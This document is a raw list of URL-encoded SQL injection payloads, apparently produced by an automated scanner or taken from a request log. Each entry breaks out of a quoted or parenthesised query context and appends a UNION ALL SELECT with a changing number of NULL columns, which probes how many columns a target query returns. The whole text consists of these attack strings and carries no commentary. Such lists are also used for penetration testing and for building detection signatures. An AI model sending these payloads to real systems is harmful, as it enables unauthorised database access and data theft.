foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 